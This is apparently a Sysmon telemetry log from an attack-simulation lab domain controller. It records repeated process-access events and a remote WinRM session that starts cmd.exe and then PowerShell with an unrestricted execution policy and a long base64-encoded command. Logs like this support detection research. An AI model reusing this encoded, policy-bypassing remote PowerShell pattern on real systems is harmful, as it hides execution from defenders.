11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-643E-6064-CF02-00000000AD01}14724976C:\Windows\system32\cmd.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.712{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
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 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-643E-6064-CD02-00000000AD01}37044668C:\Windows\system32\WinrsHost.exe{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.706{266CAFBE-643E-6064-CF02-00000000AD01}1472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcA
